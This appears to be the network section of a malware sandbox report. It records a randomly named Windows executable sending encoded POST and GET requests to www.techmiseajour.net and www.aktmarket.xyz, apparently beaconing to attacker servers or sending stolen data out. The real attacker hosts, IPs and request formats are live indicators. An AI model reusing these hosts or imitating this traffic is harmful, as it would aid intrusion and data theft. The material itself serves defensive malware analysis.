                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 53 59 74 6b 76 79 37 6d 44 68 2b 33 2b 58 30 4f 6f 34 39 55 43 52 78 68 30 66 2b 32 4f 51 49 48 75 74 4a 79 61 75 55 35 55 51 44 61 65 4c 6d 4b 63 6d 43 34 33 49 4c 31 47 71 72 51 55 4d 4f 4e 72 6f 77 55 75 4f 4f 6f 4b 4e 55 65 6e 52 37 6d 50 6d 6f 67 47 31 34 35 45 55 74 6e 49 4b 5a 79 38 50 33 32 79 6a 6e 68 69 4f 51 75 4a 38 7a 79 62 6d 47 76 69 4e 2b 58 62 57 6a 79 46 45 58 44 37 70 4d 68 78 7a 64 30 6a 4b 79 62 5a 6a 30 65 41 61 44 55 69 47 54 71 79 70 4f 65 41 65 42 37 79 62 41 55 5a 6c 62 67 66 4b 70 66 6b 59 77 6d 65 47 59 61 4c 51 3d 3d
                                                                                                            Data Ascii: yhXxt4VH=t4Js6+7a0GL8SYtkvy7mDh+3+X0Oo49UCRxh0f+2OQIHutJyauU5UQDaeLmKcmC43IL1GqrQUMONrowUuOOoKNUenR7mPmogG145EUtnIKZy8P32yjnhiOQuJ8zybmGviN+XbWjyFEXD7pMhxzd0jKybZj0eAaDUiGTqypOeAeB7ybAUZlbgfKpfkYwmeGYaLQ==


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.44983884.32.84.32805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:33:08.914823055 CET708OUTPOST /jytl/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.techmiseajour.net
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 225
                                                                                                            Origin: http://www.techmiseajour.net
                                                                                                            Referer: http://www.techmiseajour.net/jytl/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 54 34 39 6b 74 52 44 6d 50 52 2b 77 69 48 30 4f 79 49 39 51 43 52 74 68 30 61 65 6d 4f 47 34 48 75 49 31 79 62 76 55 35 5a 77 44 61 57 72 6d 31 42 57 43 7a 33 49 48 4c 47 72 6e 51 55 4d 61 4e 72 70 41 55 75 2f 4f 6e 4c 64 55 63 71 78 37 6b 53 57 6f 67 47 31 34 35 45 58 52 42 49 4b 42 79 38 2f 48 32 7a 47 4c 69 71 75 51 74 4f 38 7a 79 66 6d 47 72 69 4e 2f 34 62 55 58 55 46 48 76 44 37 73 77 68 2f 48 70 33 74 4b 79 64 47 7a 31 43 4a 66 32 62 36 57 75 6a 34 71 4c 2f 50 64 74 6c 33 64 4e 4f 49 55 36 33 4e 4b 4e 73 35 66 35 53 54 46 6c 54 51 53 6b 77 4b 67 66 52 71 34 4c 55 6f 34 30 54 67 55 69 69 57 6f 77 3d
                                                                                                            Data Ascii: yhXxt4VH=t4Js6+7a0GL8T49ktRDmPR+wiH0OyI9QCRth0aemOG4HuI1ybvU5ZwDaWrm1BWCz3IHLGrnQUMaNrpAUu/OnLdUcqx7kSWogG145EXRBIKBy8/H2zGLiquQtO8zyfmGriN/4bUXUFHvD7swh/Hp3tKydGz1CJf2b6Wuj4qL/Pdtl3dNOIU63NKNs5f5STFlTQSkwKgfRq4LUo40TgUiiWow=


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.44984784.32.84.32805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:33:11.603178978 CET10790OUTPOST /jytl/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.techmiseajour.net
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 10305
                                                                                                            Origin: http://www.techmiseajour.net
                                                                                                            Referer: http://www.techmiseajour.net/jytl/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 54 34 39 6b 74 52 44 6d 50 52 2b 77 69 48 30 4f 79 49 39 51 43 52 74 68 30 61 65 6d 4f 47 77 48 75 36 4e 79 61 49 41 35 59 77 44 61 63 4c 6d 4f 42 57 43 55 33 4c 33 78 47 72 36 72 55 50 69 4e 71 4f 6f 55 6f 4c 36 6e 42 64 55 63 6a 52 37 6c 50 6d 70 30 47 32 42 79 45 55 35 42 49 4b 42 79 38 39 76 32 69 54 6e 69 73 75 51 75 4a 38 7a 75 62 6d 47 54 69 4e 6e 43 62 58 37 69 46 33 50 44 37 4d 41 68 39 30 42 33 6c 4b 79 66 46 7a 31 4b 4a 66 7a 62 36 56 61 46 34 70 57 71 50 65 78 6c 32 4c 55 36 4e 47 47 77 62 37 70 56 38 64 74 6a 58 6c 64 32 63 78 77 56 43 77 33 39 70 71 44 32 6a 59 68 65 2f 6e 7a 6b 4a 64 45 44 48 6d 7a 63 34 6b 59 4b 73 33 77 70 56 62 67 63 6f 78 36 70 73 79 50 79 52 30 47 78 71 57 34 65 67 2f 4d 59 74 6b 6f 57 45 53 34 44 71 4d 66 31 62 41 4a 56 30 67 64 71 32 69 47 39 51 6f 79 6d 41 33 45 64 66 61 6f 4e 71 37 36 50 34 76 4a 53 2b 71 69 30 64 44 34 67 6b 64 30 4b 74 49 73 37 57 4e 7a 55 56 6d 73 65 42 41 64 53 59 6a 31 61 5a [TRUNCATED]
                                                                                                            Data Ascii: yhXxt4VH=t4Js6+7a0GL8T49ktRDmPR+wiH0OyI9QCRth0aemOGwHu6NyaIA5YwDacLmOBWCU3L3xGr6rUPiNqOoUoL6nBdUcjR7lPmp0G2ByEU5BIKBy89v2iTnisuQuJ8zubmGTiNnCbX7iF3PD7MAh90B3lKyfFz1KJfzb6VaF4pWqPexl2LU6NGGwb7pV8dtjXld2cxwVCw39pqD2jYhe/nzkJdEDHmzc4kYKs3wpVbgcox6psyPyR0GxqW4eg/MYtkoWES4DqMf1bAJV0gdq2iG9QoymA3EdfaoNq76P4vJS+qi0dD4gkd0KtIs7WNzUVmseBAdSYj1aZaBxRLzmfTMMLHfDyovpbSbl8iek0OjGAjnUJlwcMs77m9cpsBdfOeO1Qg/eYzOcmCsgMQlyaSq89x7j1OmaJil7TaBmnXEpDeTCTf826Ycx99j/HX6D020rOexwOZb22L5f4GxftIOvTsvUVLdXQG8ncHMPgKydmZTFJQwHU0wVZTUTvFQnPy0iIlJpo5wjAQMvIk4yACwx1PawFc+rpPC1WPqzOuqfNXrKLMDq2avRfN3roeAEZIdtdeogldTodAz0KOJjsJ3KY3Pp2ZfgMwgyjHUTG9a4aPGBLPyTsn2mT3q2/rkCZX3cPnF7x9e1GTwzCd05lrz4PL+D98Mkt1DmsTXPgAzovHA4WlJeK9quzy49ojbRvjKP2wfKfeGOp3UxhnsfCayE2HowISJniq1WYQfx6WyqaJ2xnoNpXlnKQHx3kGeNnZbk+bKSnrwrfSg0MFqo5djgMck4tGA+pImMqDVUVX1xOaKTrjrrzLANtS3yMlnswz4ht7Nn2WO+Md0b5R/7sHzJo4DtLhTwsS797HrLQimtiKRRG8te5jf8Cp6fOvLT11zX/9A4sSKL+EhIL1gi+EMHwFYGjhUCdWvbSmA6g1ICFzYJNohkc0utYJqM0lzxgsIBPeyWYY3nwb2TFxPQkdu///CLepgwV2XPH31XNPzdbUI [TRUNCATED]


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.44985484.32.84.32805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:33:14.391096115 CET414OUTGET /jytl/?yhXxt4VH=g6hM5OfAy0aZTOdwti/FGwGF0lxL069nbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4IM1EjQT2IGwGJnxeHmxIKuUG6sD+9Xyx6N0=&7j=yfeP18RhphLhR HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.techmiseajour.net
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Dec 6, 2024 09:33:15.400970936 CET1236INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 06 Dec 2024 08:33:15 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 9973
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Server: hcdn
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            x-hcdn-request-id: e0f60478e28ea1af06b0b470b1b6a3fa-bos-edge4
                                                                                                            Expires: Fri, 06 Dec 2024 08:33:14 GMT
                                                                                                            Cache-Control: no-cache
                                                                                                            Accept-Ranges: bytes
                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                                                            Dec 6, 2024 09:33:15.400999069 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                                                            Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                                                            Dec 6, 2024 09:33:15.401012897 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                                                            Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                                                            Dec 6, 2024 09:33:15.401109934 CET1236INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                                            Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                                                            Dec 6, 2024 09:33:15.401123047 CET1236INData Raw: 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 6d 79 4e 61 76 62 61 72 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61
                                                                                                            Data Ascii: =120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials
                                                                                                            Dec 6, 2024 09:33:15.401237011 CET1236INData Raw: 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3e 42 75 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73
                                                                                                            Data Ascii: s=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hosti
                                                                                                            Dec 6, 2024 09:33:15.401251078 CET1236INData Raw: 64 65 41 74 28 74 2b 2b 29 29 29 29 7b 69 66 28 65 3d 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2b 2b 29 2c 35 35 32 39 36 21 3d 28 36 34 35 31 32 26 72 29 7c 7c 35 36 33 32 30 21 3d 28 36 34 35 31 32 26 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52
                                                                                                            Data Ascii: deAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){i
                                                                                                            Dec 6, 2024 09:33:15.401273012 CET1236INData Raw: 70 2c 73 3c 28 43 3d 67 3c 3d 69 3f 31 3a 69 2b 32 36 3c 3d 67 3f 32 36 3a 67 2d 69 29 29 62 72 65 61 6b 3b 69 66 28 70 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 28 6f 2d 43 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e
                                                                                                            Data Ascii: p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.
                                                                                                            Dec 6, 2024 09:33:15.401292086 CET424INData Raw: 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 6e 29 7b 76 61 72 20 74 3d 72 5b 6e 5d 3b 65 2e 70 75 73 68 28 74 2e 6d 61 74 63 68 28 2f 5b 5e 41 2d 5a 61 2d 7a 30 2d 39 2d 5d 2f 29 3f 22 78
                                                                                                            Data Ascii: .split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?puny


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.44987013.248.169.48805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:33:21.086631060 CET676OUTPOST /wb7v/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.aktmarket.xyz
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 205
                                                                                                            Origin: http://www.aktmarket.xyz
                                                                                                            Referer: http://www.aktmarket.xyz/wb7v/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 39 7a 73 4f 2b 62 6d 4f 55 43 6d 73 6e 58 75 67 55 31 2f 77 58 48 36 61 55 45 66 63 34 36 68 45 44 74 52 2f 57 54 4a 58 51 30 56 57 57 63 59 56 75 57 58 63 33 71 6b 4a 33 4c 72 59 44 6f 47 4a 79 79 4d 31 65 68 6f 54 48 4d 46 50 58 75 39 5a 31 73 37 65 46 54 55 64 6f 32 2f 34 30 7a 46 6f 67 66 66 4a 72 66 6f 6d 74 68 74 51 68 37 35 48 76 63 6f 6d 4b 58 6d 34 68 39 65 55 54 2b 66 6d 55 55 31 75 4d 66 71 6a 51 42 38 4f 35 6a 77 71 44 68 72 33 70 38 7a 4c 4f 56 31 34 42 67 64 70 51 61 62 77 54 37 4c 44 43 5a 46 41 79 44 7a 53 32 67 71 59 64 77 3d 3d
                                                                                                            Data Ascii: yhXxt4VH=FCc6E16lz2LQ9zsO+bmOUCmsnXugU1/wXH6aUEfc46hEDtR/WTJXQ0VWWcYVuWXc3qkJ3LrYDoGJyyM1ehoTHMFPXu9Z1s7eFTUdo2/40zFogffJrfomthtQh75HvcomKXm4h9eUT+fmUU1uMfqjQB8O5jwqDhr3p8zLOV14BgdpQabwT7LDCZFAyDzS2gqYdw==
                                                                                                            Dec 6, 2024 09:33:22.206442118 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.44987713.248.169.48805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:33:23.755806923 CET696OUTPOST /wb7v/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.aktmarket.xyz
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 225
                                                                                                            Origin: http://www.aktmarket.xyz
                                                                                                            Referer: http://www.aktmarket.xyz/wb7v/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 38 53 63 4f 6c 34 4f 4f 46 53 6d 72 37 6e 75 67 47 31 2f 30 58 48 6d 61 55 41 75 48 34 73 52 45 44 4e 68 2f 59 79 4a 58 41 6b 56 57 4f 4d 59 4d 6b 32 58 62 33 71 70 30 33 4b 58 59 44 6f 43 4a 79 79 38 31 65 51 6f 51 57 4d 46 4a 43 65 39 62 74 4d 37 65 46 54 55 64 6f 32 37 65 30 7a 64 6f 68 76 76 4a 72 2b 6f 70 67 42 73 69 32 4c 35 48 2b 4d 6f 69 4b 58 6e 43 68 38 53 79 54 39 33 6d 55 51 6c 75 4d 75 71 6b 62 42 38 49 39 6a 78 6e 4d 45 53 7a 78 73 2b 6f 54 7a 70 4b 4a 43 56 47 63 38 57 71 43 4b 71 55 51 5a 68 7a 76 45 36 6d 37 6a 58 52 47 78 67 45 45 62 6d 5a 6a 6d 4e 71 50 4e 4e 72 48 74 62 76 52 2b 55 3d
                                                                                                            Data Ascii: yhXxt4VH=FCc6E16lz2LQ8ScOl4OOFSmr7nugG1/0XHmaUAuH4sREDNh/YyJXAkVWOMYMk2Xb3qp03KXYDoCJyy81eQoQWMFJCe9btM7eFTUdo27e0zdohvvJr+opgBsi2L5H+MoiKXnCh8SyT93mUQluMuqkbB8I9jxnMESzxs+oTzpKJCVGc8WqCKqUQZhzvE6m7jXRGxgEEbmZjmNqPNNrHtbvR+U=
                                                                                                            Dec 6, 2024 09:33:24.839090109 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.44988313.248.169.48805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:33:26.417774916 CET10778OUTPOST /wb7v/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.aktmarket.xyz
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 10305
                                                                                                            Origin: http://www.aktmarket.xyz
                                                                                                            Referer: http://www.aktmarket.xyz/wb7v/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 38 53 63 4f 6c 34 4f 4f 46 53 6d 72 37 6e 75 67 47 31 2f 30 58 48 6d 61 55 41 75 48 34 76 78 45 43 2b 70 2f 58 78 68 58 44 6b 56 57 48 73 59 4a 6b 32 58 47 33 71 78 77 33 4b 61 74 44 72 71 4a 6a 67 30 31 59 6a 77 51 50 63 46 4a 64 4f 39 59 31 73 37 50 46 54 6b 52 6f 32 4c 65 30 7a 64 6f 68 73 33 4a 73 76 6f 70 69 42 74 51 68 37 35 39 76 63 6f 61 4b 58 65 67 68 38 57 45 54 4e 58 6d 58 78 4a 75 66 73 53 6b 57 42 38 4b 36 6a 77 30 4d 45 57 38 78 73 79 65 54 7a 30 58 4a 41 4a 47 4d 61 58 72 59 37 53 79 47 66 35 70 38 33 75 6b 38 69 76 57 43 43 55 71 4a 35 57 46 36 43 4a 32 49 71 74 75 53 39 2b 70 53 37 6b 4a 62 4c 4e 35 6d 69 52 4e 37 69 66 45 6c 70 50 2b 78 48 47 42 2f 2f 52 75 6f 71 61 56 2b 66 31 6b 35 59 75 46 33 68 33 67 74 31 59 58 72 56 46 56 66 4b 75 62 69 31 61 6d 55 2f 34 76 4f 49 4c 48 58 47 79 33 79 73 67 4a 56 54 71 75 46 42 2b 32 69 6f 57 39 34 62 77 31 4a 44 51 48 6e 48 64 53 79 68 64 6e 58 42 39 35 39 53 71 69 34 70 63 7a 61 [TRUNCATED]
                                                                                                            Data Ascii: yhXxt4VH=FCc6E16lz2LQ8ScOl4OOFSmr7nugG1/0XHmaUAuH4vxEC+p/XxhXDkVWHsYJk2XG3qxw3KatDrqJjg01YjwQPcFJdO9Y1s7PFTkRo2Le0zdohs3JsvopiBtQh759vcoaKXegh8WETNXmXxJufsSkWB8K6jw0MEW8xsyeTz0XJAJGMaXrY7SyGf5p83uk8ivWCCUqJ5WF6CJ2IqtuS9+pS7kJbLN5miRN7ifElpP+xHGB//RuoqaV+f1k5YuF3h3gt1YXrVFVfKubi1amU/4vOILHXGy3ysgJVTquFB+2ioW94bw1JDQHnHdSyhdnXB959Sqi4pczaS0MbqzV/5PuSeUrfb1ob6ZVExGUtqka+cFNc5DJyp9fXufy6rpmch4mu2llWCXuR2wLMnOyT/0n11xW1vQIosi14lEUKuNkIsGKzAB81Yy5kSO8Np6oYlRX+91wlf+zoYArsIBWIn6d0Cz7sNFPVnf9sONLJgsB2KOh+I5YSvf0/FPttGIVCvmEO/tP048MrSLu/KWKgxmIkaM5rZqdcJoW+yIIsATlRxdfYSHIncabS3fIONWDP83tRBYR7JV01k25HTMYpVjwNJrqrJ2K3pw9anxIEzibmHLDFuNJqmHkq1Moh6/fjHikTf8xuTzBWsQQNaNyuGtWmQsYC0ppMMGIWiI8C9HdSpgSS6RLsB+Qkw6r6E+AJY8nywmbFIFp7Sy0QssTHhU8pytSFeiBg0PFk77lYzNUCqsf1yvHjye/aoHenwJgsoVGga8V+HJ0oe7FQG2ftB4JAbATUs6HftErcqlLDTzA0UmqCAi8gv2iyfHGTlytZ53VuuRg8AFa1o9ucs17ntrqa5RaoSlG9mti7iU1EwXtLlJ/BG/iZ9xi+vRj2DrtWfE3VMCjzhe18ZZTiSIbfsf1OCWLf59/9CoymQM7xY8h1UubDp9lkSrGIpINdMluoy1DL/mrjVJHVJSHn6SMySR7aaK8IzFioN82CpA6m25GWI7 [TRUNCATED]
                                                                                                            Dec 6, 2024 09:33:27.501828909 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.44989313.248.169.48805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:33:29.078272104 CET410OUTGET /wb7v/?yhXxt4VH=IA0aHAKfw1DI7Bcblr+MbxWptTyqPXzIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwND/F2b9kUq8bbEXkcoGvOpHRcusnJqNxo6xE=&7j=yfeP18RhphLhR HTTP/1.1
